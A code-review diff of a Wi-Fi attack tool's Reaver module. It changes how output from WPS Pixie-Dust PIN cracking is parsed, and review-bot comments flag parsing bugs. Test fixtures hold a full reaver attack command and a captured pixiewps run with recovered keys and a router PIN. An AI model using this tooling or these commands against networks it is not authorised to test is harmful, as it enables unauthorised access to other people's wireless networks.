Trying to fix bully & reaver Pixie-Dust attacks.
Haven't even looked at PIN attacks yet. Hopefully helps out with #28
104
py/Reaver.py
104
py/Reaver.py
@@ -70,7 +70,7 @@ class Reaver(Attack):
|
||||
(pin, psk, ssid) = self.get_pin_psk_ssid(stdout)
|
||||
|
||||
# Check if we cracked it, or if process stopped.
|
||||
if (pin and psk and ssid) or reaver.poll() is not None:
|
||||
if pin is not None or reaver.poll() is not None:
|
||||
reaver.interrupt()
|
||||
|
||||
# Check one-last-time for PIN/PSK/SSID, in case of race condition.
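Review bot: The relaxed guard `if pin is not None or reaver.poll() is not None:` treats an empty PIN as a crack, because the first PIN pattern added in get_pin_psk_ssid (hunk @@ -341, `WPS pin:\s*([0-9]*)`) can match zero digits and then returns `''`, which is not None. The same `pin is not None` test is repeated in the hunks at @@ -78 and @@ -219. Either make that pattern require at least one digit, `([0-9]+)`, or test truthiness here, `if pin or reaver.poll() is not None:`. The enclosing loop continues outside the hunk.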
|
||||
@@ -78,11 +78,12 @@ class Reaver(Attack):
|
||||
(pin, psk, ssid) = Reaver.get_pin_psk_ssid(stdout)
|
||||
|
||||
# Check if we cracked it.
|
||||
if pin and psk and ssid:
|
||||
if pin is not None:
|
||||
# We cracked it.
|
||||
bssid = self.target.bssid
|
||||
Color.clear_entire_line()
|
||||
Color.pattack("WPS", airodump_target, "Pixie-Dust", "{G}successfully cracked WPS PIN and PSK{W}\n")
|
||||
Color.pattack("WPS", airodump_target, "Pixie-Dust", "{G}successfully cracked WPS PIN and PSK{W}")
|
||||
Color.pl("")
|
||||
self.crack_result = CrackResultWPS(bssid, ssid, pin, psk)
|
||||
self.crack_result.dump()
|
||||
return True
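Review bot: Now that the check is only `if pin is not None:`, `self.crack_result = CrackResultWPS(bssid, ssid, pin, psk)` can be built with `psk` and `ssid` still None — get_pin_psk_ssid's own comment says Reaver 1.6.x may not print a PSK at all. The hunk at @@ -219 substitutes `''` and `target.essid` before constructing its result, but this path does not, so the two success paths produce different records for the same output. Apply the same substitution here, `psk = psk or ''` and `ssid = ssid or self.target.essid`, or document on CrackResultWPS that None is an accepted value. The surrounding method begins outside the hunk.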
|
||||
@@ -219,7 +220,11 @@ class Reaver(Attack):
|
||||
# CHECK FOR CRACK
|
||||
|
||||
(pin, psk, ssid) = Reaver.get_pin_psk_ssid(out)
|
||||
if pin and psk and ssid:
|
||||
if pin is not None:
|
||||
if psk is None:
|
||||
psk = ''
|
||||
elif ssid is None:
|
||||
ssid = target.essid
|
||||
# We cracked it.
|
||||
self.success = True
|
||||
Color.pl('\n{+} {G}successly cracked WPS PIN and PSK{W}\n')
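Review bot: The `elif ssid is None:` fallback is skipped whenever the preceding `if psk is None:` branch runs, so output that lacks both a PSK and an SSID — exactly the 1.6.x case the new fixture in this commit describes — leaves `ssid` None on this path. The two defaults are independent and should be two `if` statements: `if psk is None: psk = ''` followed by `if ssid is None: ssid = target.essid`. The success message also has a typo, `successly`, which the next hunk's message spells `successfully`. The enclosing function continues outside the hunk.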
|
||||
@@ -238,15 +243,14 @@ class Reaver(Attack):
|
||||
if match:
|
||||
# Reset failures on successful try
|
||||
failures = 0
|
||||
groups = match.groups()
|
||||
pin_current = int(groups[0])
|
||||
pin_total = int(groups[1])
|
||||
pin_current = int(match.group(1))
|
||||
pin_total = int(match.group(2))
|
||||
|
||||
# Reaver 1.3, 1.4
|
||||
match = None
|
||||
for match in re.finditer('Trying pin (\d+)', out):
|
||||
if match:
|
||||
pin = int(match.groups()[0])
|
||||
pin = int(match.group(1))
|
||||
if pin not in pins:
|
||||
# Reset failures on successful try
|
||||
failures = 0
|
||||
@@ -282,14 +286,14 @@ class Reaver(Attack):
|
||||
|
||||
match = re.search('Estimated Remaining time: ([a-zA-Z0-9]+)', out)
|
||||
if match:
|
||||
eta = match.groups()[0]
|
||||
eta = match.group(1)
|
||||
state = '{C}cracking, ETA: {G}%s{W}' % eta
|
||||
|
||||
match = re.search('Max time remaining at this rate: ([a-zA-Z0-9:]+)..([0-9]+) pins left to try', out)
|
||||
if match:
|
||||
eta = match.groups()[0]
|
||||
eta = match.group(1)
|
||||
state = '{C}cracking, ETA: {G}%s{W}' % eta
|
||||
pins_left = int(match.groups()[1])
|
||||
pins_left = int(match.group(2))
|
||||
|
||||
# Divine pin_current & pin_total from this:
|
||||
pin_current = 11000 - pins_left
|
||||
@@ -341,24 +345,29 @@ class Reaver(Attack):
|
||||
pin = psk = ssid = None
|
||||
|
||||
# Check for PIN.
|
||||
# PIN: Printed *before* the attack completes.
|
||||
regex = re.search('WPS pin: *([0-9]*)', stdout)
|
||||
''' [+] WPS pin: 11867722'''
|
||||
regex = re.search(r"WPS pin:\s*([0-9]*)", stdout, re.IGNORECASE)
|
||||
if regex:
|
||||
pin = regex.groups()[0]
|
||||
# PIN: Printed when attack is completed.
|
||||
regex = re.search("WPS PIN: *'([0-9]+)'", stdout)
|
||||
if regex:
|
||||
pin = regex.groups()[0]
|
||||
pin = regex.group(1)
|
||||
|
||||
# Check for PSK.
|
||||
# Note: Reaver 1.6.x does not appear to return PSK (?)
|
||||
regex = re.search("WPA PSK: *'(.+)'", stdout)
|
||||
if regex:
|
||||
psk = regex.groups()[0]
|
||||
psk = regex.group(1)
|
||||
|
||||
# Check for SSID
|
||||
regex = re.search("AP SSID: *'(.+)'", stdout)
|
||||
"""1.x [Reaver Test] [+] AP SSID: 'Test Router' """
|
||||
regex = re.search(r"AP SSID:\s*'(.*)'", stdout)
|
||||
if regex:
|
||||
ssid = regex.groups()[0]
|
||||
ssid = regex.group(1)
|
||||
|
||||
# Check (again) for SSID
|
||||
if ssid is None:
|
||||
"""1.6.x [+] Associated with EC:1A:59:37:70:0E (ESSID: belkin.00e)"""
|
||||
regex = re.search(r"Associated with [0-9A-F:]+ \(ESSID: (.*)\)", stdout)
|
||||
if regex:
|
||||
ssid = regex.group(1)
|
||||
|
||||
return (pin, psk, ssid)
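Review bot: The example-output strings added at `''' [+] WPS pin: 11867722'''`, `"""1.x [Reaver Test] [+] AP SSID: 'Test Router' """` and `"""1.6.x [+] Associated with ... (ESSID: belkin.00e)"""` are bare expression statements, not comments; they are evaluated and discarded at runtime and read like misplaced docstrings. Write them as `#` comments, e.g. `# 1.6.x: [+] Associated with EC:1A:59:37:70:0E (ESSID: belkin.00e)`. Two smaller points: the first PIN match still reads `regex.groups()[0]` while every other capture in the commit was switched to `.group(1)`, and the new ESSID pattern only accepts upper-case hex in `[0-9A-F:]+`, so it would silently miss the association line if reaver ever prints a lower-case BSSID — `[0-9A-Fa-f:]+` costs nothing. The function's signature is outside the hunk.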
|
||||
|
||||
@@ -372,7 +381,7 @@ class Reaver(Attack):
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
stdout = '''
|
||||
old_stdout = '''
|
||||
[Pixie-Dust]
|
||||
[Pixie-Dust] Pixiewps 1.1
|
||||
[Pixie-Dust]
|
||||
@@ -390,7 +399,52 @@ Cmd : reaver -i wlan0mon -b 08:86:3B:8C:FD:9C -c 11 -s y -vv -p 28097402
|
||||
[Reaver Test] [+] WPS PIN: '12345678'
|
||||
[Reaver Test] [+] WPA PSK: 'Test PSK'
|
||||
[Reaver Test] [+] AP SSID: 'Test Router'
|
||||
'''
|
||||
print Reaver.get_pin_psk_ssid(stdout)
|
||||
pass
|
||||
'''
|
||||
|
||||
# From vom513 in https://github.com/derv82/wifite2/issues/60
|
||||
new_stdout = '''
|
||||
[+] Switching wlan1mon to channel 5
|
||||
[+] Waiting for beacon from EC:1A:59:37:70:0E
|
||||
[+] Received beacon from EC:1A:59:37:70:0E
|
||||
[+] Vendor: RealtekS
|
||||
[+] Trying pin "12345670"
|
||||
[+] Sending authentication request
|
||||
[+] Sending association request
|
||||
[+] Associated with EC:1A:59:37:70:0E (ESSID: belkin.00e)
|
||||
[+] Sending EAPOL START request
|
||||
[+] Received identity request
|
||||
[+] Sending identity response
|
||||
[+] Received M1 message
|
||||
[+] Sending M2 message
|
||||
|
||||
Pixiewps 1.4
|
||||
|
||||
[?] Mode: 3 (RTL819x)
|
||||
[*] Seed N1: -
|
||||
[*] Seed ES1: -
|
||||
[*] Seed ES2: -
|
||||
[*] PSK1: 2c2e33f5e3a870759f0aeebbd2792450
|
||||
[*] PSK2: 3f4ca4ea81b2e8d233a4b80f9d09805d
|
||||
[*] ES1: 04d48dc20ec785762ce1a21a50bc46c2
|
||||
[*] ES2: 04d48dc20ec785762ce1a21a50bc46c2
|
||||
[+] WPS pin: 11867722
|
||||
|
||||
[*] Time taken: 0 s 21 ms
|
||||
|
||||
executing pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b -s 5a67001334e3e4cb236f4e134a4d3b48d625a648e991f978d9aca879469d5da5 -z c8a2ccc5fb6dc4f4d69b245091022dc7e998e42ec1d548d57c35a312ff63ef20 -a 60b59c0c587c6c44007f7081c3372489febbe810a97483f5cc5cd8463c3920de -n 04d48dc20ec785762ce1a21a50bc46c2 -r 7a191e22a7b519f40d3af21b93a21d4f837718b45063a8a69ac6d16c6e5203477c18036ca01e9e56d0322e70c2e1baa66518f1b46d01acc577d1dfa34efd2e9ee36e2b7e68819cddacceb596a8895243e33cb48c570458a539dcb523a4d4c4360e158c29b882f7f385821ea043705eb56538b45daa445157c84e60fc94ef48136eb4e9725b134902b96c90b1ae54cbd42b29b52611903fdae5aa88bfc320f173d2bbe31df4996ebdb51342c6b8bd4e82ae5aa80b2a09a8bf8faa9a8332dc9819
|
||||
'''
|
||||
(pin, psk, ssid) = Reaver.get_pin_psk_ssid(old_stdout)
|
||||
assert pin == '12345678', 'pin was "%s", should have been "12345678"' % pin
|
||||
assert psk == 'Test PSK', 'psk was "%s", should have been "Test PSK"' % psk
|
||||
assert ssid == "Test Router", 'ssid was %s, should have been Test Router' % repr(ssid)
|
||||
result = CrackResultWPS('AA:BB:CC:DD:EE:FF', ssid, pin, psk)
|
||||
result.dump()
|
||||
|
||||
print ""
|
||||
|
||||
(pin, psk, ssid) = Reaver.get_pin_psk_ssid(new_stdout)
|
||||
assert pin == '11867722', 'pin was "%s", should have been "11867722"' % pin
|
||||
assert psk == None, 'psk was "%s", should have been "None"' % psk
|
||||
assert ssid == "belkin.00e", 'ssid was "%s", should have been "belkin.00e"' % repr(ssid)
|
||||
result = CrackResultWPS('AA:BB:CC:DD:EE:FF', ssid, pin, psk)
|
||||
result.dump()
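Review bot: `assert psk == None` on the second fixture should be `assert psk is None`; the rest of the file compares against None with `is`, and `==` is the standard lint finding. The failure message in the same line also quotes the value, `'psk was "%s", should have been "None"'`, so a real None reads as the string "None" — `repr(psk)` as used in the ssid assert would be clearer. Note these asserts only execute when the module is run directly, so they document expected parsing rather than act as a test harness. The `if __name__ == '__main__':` that encloses this block begins in the previous hunk.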
|
||||
|
||||